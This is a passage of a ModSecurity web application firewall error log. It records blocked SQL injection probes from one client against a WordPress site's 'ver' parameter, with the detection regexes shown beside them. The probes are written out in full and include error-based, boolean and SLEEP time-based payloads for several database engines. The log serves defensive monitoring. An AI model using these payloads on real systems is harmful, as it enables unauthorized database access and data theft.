"(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16 AND 2944=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2944=2944) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC)-- pNNC"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhoxkekPtrPbqLNY4NQAAAMU"] [Wed Jun 26 16:17:58.310133 2024] [:error] [pid 31859:tid 140055200859904] [client 141.98.81.52:34156] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 4.2.16) AND 6737=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(113) CHAR(113) (SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(106) CHAR(106) CHAR(113))) AND (2011=2011"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhoxkekPtrPbqLNY4NgAAANY"] [Wed Jun 26 16:17:58.556278 2024] [:error] [pid 31859:tid 140055424419584] [client 141.98.81.52:34158] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 4.2.16 AND 6737=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(113) CHAR(113) (SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(106) CHAR(106) CHAR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhoxkekPtrPbqLNY4NwAAAMQ"] [Wed Jun 26 16:17:58.787392 2024] [:error] [pid 31859:tid 140055284786944] [client 141.98.81.52:34160] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 4.2.16') AND 6737=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(113) CHAR(113) (SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(106) CHAR(106) CHAR(113))) AND ('mTJZ'='mTJZ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhoxkekPtrPbqLNY4OAAAAMw"] [Wed Jun 26 16:17:59.042508 2024] [:error] [pid 31244:tid 140055226038016] [client 141.98.81.52:34162] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 4.2.16' AND 6737=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(113) CHAR(113) (SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(106) CHAR(106) CHAR(113))) AND 'rcZH'='rcZH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFh-bXXCyFmkhe1iNqQwAAABM"] [Wed Jun 26 16:17:59.283063 2024] [:error] [pid 31244:tid 140055242823424] [client 141.98.81.52:34164] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 4.2.16%' AND 6737=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(113) CHAR(113) (SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(106) CHAR(106) CHAR(113))) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFh-bXXCyFmkhe1iNqRAAAABE"] [Wed Jun 26 16:17:59.518986 2024] [:error] [pid 31244:tid 140055209252608] [client 141.98.81.52:34166] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 4.2.16 AND 6737=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(113) CHAR(113) (SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(106) CHAR(106) CHAR(113)))-- LMDY"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFh-bXXCyFmkhe1iNqRQAAABU"] [Wed Jun 26 16:17:59.763587 2024] [:error] [pid 31245:tid 140055209252608] [client 141.98.81.52:34168] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16) AND 7440=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7440=7440) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (1825=1825"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFh657xDCgKzJ-zxAxhwAAAFU"] [Wed Jun 26 16:18:00.227252 2024] [:error] [pid 31245:tid 140055192467200] [client 141.98.81.52:34172] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16 AND 7440=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7440=7440) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiK57xDCgKzJ-zxAxiAAAAFc"] [Wed Jun 26 16:18:00.477128 2024] [:error] [pid 31245:tid 140055200859904] [client 141.98.81.52:34174] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16') AND 7440=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7440=7440) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('VceX'='VceX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiK57xDCgKzJ-zxAxiQAAAFY"] [Wed Jun 26 16:18:00.716971 2024] [:error] [pid 31246:tid 140055284786944] [client 141.98.81.52:34176] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16' AND 7440=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7440=7440) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'kOeb'='kOeb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiFxchXPGtOGw21Gp1gAAAIw"] [Wed Jun 26 16:18:00.966222 2024] [:error] [pid 31246:tid 140055259608832] [client 141.98.81.52:34178] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16%' AND 7440=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7440=7440) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiFxchXPGtOGw21Gp1wAAAI8"] [Wed Jun 26 16:18:01.199989 2024] [:error] [pid 31859:tid 140055326750464] [client 141.98.81.52:34180] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16 AND 7440=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7440=7440) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- YwgS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiYxkekPtrPbqLNY4OQAAAMc"] [Wed Jun 26 16:18:01.449193 2024] [:error] [pid 31246:tid 140055424419584] [client 141.98.81.52:34182] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: (SELECT 8291 FROM(SELECT COUNT(*),CONCAT(0x71766a7171,(SELECT (ELT(8291=8291,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiVxchXPGtOGw21Gp2AAAAIQ"] [Wed Jun 26 16:18:01.694876 2024] [:error] [pid 31246:tid 140055234430720] [client 141.98.81.52:34184] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: (SELECT CONCAT(0x71766a7171,(SELECT (ELT(5766=5766,1))),0x717a6a6a71))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiVxchXPGtOGw21Gp2QAAAJI"] [Wed Jun 26 16:18:01.943022 2024] [:error] [pid 31246:tid 140055184074496] [client 141.98.81.52:34186] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: (SELECT (CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2134=2134) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFiVxchXPGtOGw21Gp2gAAAJg"] [Wed Jun 26 16:18:02.188007 2024] [:error] [pid 31246:tid 140055251216128] [client 141.98.81.52:34188] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CHAR( found within ARGS:ver: (SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(113) CHAR(113) (SELECT (CASE WHEN (4663=4663) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(106) CHAR(106) CHAR(113))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFilxchXPGtOGw21Gp2wAAAJA"] [Wed Jun 26 16:18:02.439307 2024] [:error] [pid 31859:tid 140055268001536] [client 141.98.81.52:34190] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16);SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFioxkekPtrPbqLNY4OgAAAM4"] [Wed Jun 26 16:18:02.675451 2024] [:error] [pid 31859:tid 140055184074496] [client 141.98.81.52:34192] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16;SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFioxkekPtrPbqLNY4OwAAANg"] [Wed Jun 26 16:18:02.921652 2024] [:error] [pid 31859:tid 140055217645312] 